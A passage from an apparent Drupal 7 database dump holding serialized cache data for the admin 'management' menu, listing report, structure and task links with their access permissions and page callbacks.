problems.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-60\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"55\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"system_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/status\";s:5:\"title\";s:13:\"Status report\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:74:\"Get a status report about your site\'s operation and any detected problems.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:58;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"58\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:27:\"admin/reports/access-denied\";s:11:\"router_path\";s:27:\"admin/reports/access-denied\";s:10:\"link_title\";s:26:\"Top \'access denied\' errors\";s:7:\"options\";s:85:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:35:\"View \'access denied\' errors (403s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"58\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:31:\"a:1:{i:0;s:13:\"access denied\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:27:\"admin/reports/access-denied\";s:5:\"title\";s:26:\"Top \'access denied\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:35:\"View \'access denied\' errors (403s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:59;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"59\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:28:\"admin/reports/page-not-found\";s:11:\"router_path\";s:28:\"admin/reports/page-not-found\";s:10:\"link_title\";s:27:\"Top \'page not found\' errors\";s:7:\"options\";s:86:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:36:\"View \'page not found\' errors (404s).\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:2:\"59\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:32:\"a:1:{i:0;s:14:\"page not found\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:28:\"admin/reports/page-not-found\";s:5:\"title\";s:27:\"Top \'page not found\' errors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:36:\"View \'page not found\' errors (404s).\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:100;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"100\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/event/%\";s:11:\"router_path\";s:21:\"admin/reports/event/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"100\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:11:\"dblog_event\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/event/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:192;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"192\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:20:\"admin/reports/search\";s:11:\"router_path\";s:20:\"admin/reports/search\";s:10:\"link_title\";s:18:\"Top search phrases\";s:7:\"options\";s:83:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:33:\"View most popular search phrases.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"192\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:37:\"a:1:{i:0;s:19:\"access site reports\";}\";s:13:\"page_callback\";s:9:\"dblog_top\";s:14:\"page_arguments\";s:23:\"a:1:{i:0;s:6:\"search\";}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:20:\"admin/reports/search\";s:5:\"title\";s:18:\"Top search phrases\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:33:\"View most popular search phrases.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:298;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"298\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/updates\";s:11:\"router_path\";s:21:\"admin/reports/updates\";s:10:\"link_title\";s:17:\"Available updates\";s:7:\"options\";s:132:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:82:\"Get a status report about available updates for your installed modules and themes.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-50\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"298\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:47:\"a:1:{i:0;s:29:\"administer site configuration\";}\";s:13:\"page_callback\";s:13:\"update_status\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/updates\";s:5:\"title\";s:17:\"Available updates\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:82:\"Get a status report about available updates for your installed modules and themes.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:402;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"402\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:18:\"admin/reports/hits\";s:11:\"router_path\";s:18:\"admin/reports/hits\";s:10:\"link_title\";s:11:\"Recent hits\";s:7:\"options\";s:93:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:43:\"View pages that have recently been visited.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"402\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:22:\"statistics_recent_hits\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:18:\"admin/reports/hits\";s:5:\"title\";s:11:\"Recent hits\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:43:\"View pages that have recently been visited.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:403;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"403\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:19:\"admin/reports/pages\";s:11:\"router_path\";s:19:\"admin/reports/pages\";s:10:\"link_title\";s:9:\"Top pages\";s:7:\"options\";s:91:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:41:\"View pages that have been hit frequently.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"1\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"403\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:20:\"statistics_top_pages\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:19:\"admin/reports/pages\";s:5:\"title\";s:9:\"Top pages\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:41:\"View pages that have been hit frequently.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:404;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"404\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:23:\"admin/reports/referrers\";s:11:\"router_path\";s:23:\"admin/reports/referrers\";s:10:\"link_title\";s:13:\"Top referrers\";s:7:\"options\";s:69:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:19:\"View top referrers.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"404\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:24:\"statistics_top_referrers\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:23:\"admin/reports/referrers\";s:5:\"title\";s:13:\"Top referrers\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:19:\"View top referrers.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:405;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"405\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/visitors\";s:11:\"router_path\";s:22:\"admin/reports/visitors\";s:10:\"link_title\";s:12:\"Top visitors\";s:7:\"options\";s:84:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:34:\"View visitors that hit many pages.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"2\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"405\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:23:\"statistics_top_visitors\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/visitors\";s:5:\"title\";s:12:\"Top visitors\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:34:\"View visitors that hit many pages.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:411;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"411\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:22:\"admin/reports/access/%\";s:11:\"router_path\";s:22:\"admin/reports/access/%\";s:10:\"link_title\";s:7:\"Details\";s:7:\"options\";s:66:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:16:\"View access log.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"411\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:12:\"a:1:{i:3;N;}\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:35:\"a:1:{i:0;s:17:\"access statistics\";}\";s:13:\"page_callback\";s:21:\"statistics_access_log\";s:14:\"page_arguments\";s:14:\"a:1:{i:0;i:3;}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:22:\"admin/reports/access/%\";s:5:\"title\";s:7:\"Details\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:16:\"View access log.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:416;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"416\";s:4:\"plid\";s:2:\"19\";s:9:\"link_path\";s:21:\"admin/reports/adsense\";s:11:\"router_path\";s:21:\"admin/reports/adsense\";s:10:\"link_title\";s:14:\"AdSense clicks\";s:7:\"options\";s:71:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:21:\"Track AdSense clicks.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"3\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"19\";s:2:\"p3\";s:3:\"416\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:29:\"a:1:{i:0;s:11:\"view clicks\";}\";s:13:\"page_callback\";s:17:\"adsense_click_log\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:21:\"admin/reports/adsense\";s:5:\"title\";s:14:\"AdSense clicks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:21:\"Track AdSense clicks.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:21;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"21\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:15:\"admin/structure\";s:11:\"router_path\";s:15:\"admin/structure\";s:10:\"link_title\";s:9:\"Structure\";s:7:\"options\";s:95:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:45:\"Administer blocks, content types, menus, etc.\";}}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:2:\"-8\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"21\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:0:\"\";s:8:\"tab_root\";s:15:\"admin/structure\";s:5:\"title\";s:9:\"Structure\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:1:\"6\";s:11:\"description\";s:45:\"Administer blocks, content types, menus, etc.\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}i:22;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:2:\"22\";s:4:\"plid\";s:1:\"1\";s:9:\"link_path\";s:11:\"admin/tasks\";s:11:\"router_path\";s:11:\"admin/tasks\";s:10:\"link_title\";s:5:\"Tasks\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:2:\"-1\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:3:\"-20\";s:5:\"depth\";s:1:\"2\";s:10:\"customized\";s:1:\"0\";s:2:\"p1\";s:1:\"1\";s:2:\"p2\";s:2:\"22\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";s:0:\"\";s:16:\"to_arg_functions\";s:0:\"\";s:15:\"access_callback\";s:11:\"user_access\";s:16:\"access_arguments\";s:45:\"a:1:{i:0;s:27:\"access administration pages\";}\";s:13:\"page_callback\";s:28:\"system_admin_menu_block_page\";s:14:\"page_arguments\";s:6:\"a:0:{}\";s:17:\"delivery_callback\";s:0:\"\";s:10:\"tab_parent\";s:5:\"admin\";s:8:\"tab_root\";s:5:\"admin\";s:5:\"title\";s:5:\"Tasks\";s:14:\"title_callback\";s:1:\"t\";s:15:\"title_arguments\";s:0:\"\";s:14:\"theme_callback\";s:0:\"\";s:15:\"theme_arguments\";s:6:\"a:0:{}\";s:4:\"type\";s:3:\"140\";s:11:\"description\";s:0:\"\";s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}}i:346;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:3:\"346\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:26:\"http://www.ollital.de/blog\";s:11:\"router_path\";s:0:\"\";s:10:\"link_title\";s:4:\"Blog\";s:7:\"options\";s:58:\"a:1:{s:10:\"attributes\";a:1:{s:5:\"title\";s:9:\"Mein Blog\";}}\";s:6:\"module\";s:4:\"menu\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"1\";s:12:\"has_children\";s:1:\"0\";s:8:\"expanded\";s:1:\"0\";s:6:\"weight\";s:1:\"0\";s:5:\"depth\";s:1:\"1\";s:10:\"customized\";s:1:\"1\";s:2:\"p1\";s:3:\"346\";s:2:\"p2\";s:1:\"0\";s:2:\"p3\";s:1:\"0\";s:2:\"p4\";s:1:\"0\";s:2:\"p5\";s:1:\"0\";s:2:\"p6\";s:1:\"0\";s:2:\"p7\";s:1:\"0\";s:2:\"p8\";s:1:\"0\";s:2:\"p9\";s:1:\"0\";s:7:\"updated\";s:1:\"0\";s:14:\"load_functions\";N;s:16:\"to_arg_functions\";N;s:15:\"access_callback\";N;s:16:\"access_arguments\";N;s:13:\"page_callback\";N;s:14:\"page_arguments\";N;s:17:\"delivery_callback\";N;s:10:\"tab_parent\";N;s:8:\"tab_root\";N;s:5:\"title\";N;s:14:\"title_callback\";N;s:15:\"title_arguments\";N;s:14:\"theme_callback\";N;s:15:\"theme_arguments\";N;s:4:\"type\";N;s:11:\"description\";N;s:15:\"in_active_trail\";b:0;}s:5:\"below\";a:0:{}}}s:10:\"node_links\";a:0:{}}',0,1444940198,1),('links:management:tree-data:en:4490f7db324c2eccb23dc5aef88739c8a281e26afc516ac3daba41c0c38e047b','a:2:{s:4:\"tree\";a:2:{i:1;a:2:{s:4:\"link\";a:42:{s:9:\"menu_name\";s:10:\"management\";s:4:\"mlid\";s:1:\"1\";s:4:\"plid\";s:1:\"0\";s:9:\"link_path\";s:5:\"admin\";s:11:\"router_path\";s:5:\"admin\";s:10:\"link_title\";s:14:\"Administration\";s:7:\"options\";s:6:\"a:0:{}\";s:6:\"module\";s:6:\"system\";s:6:\"hidden\";s:1:\"0\";s:8:\"external\";s:1:\"0\";s:12:\"has_children\";s:1:\"1\";s:8:\"expanded\";s:1:\"0\";s:6:\"wei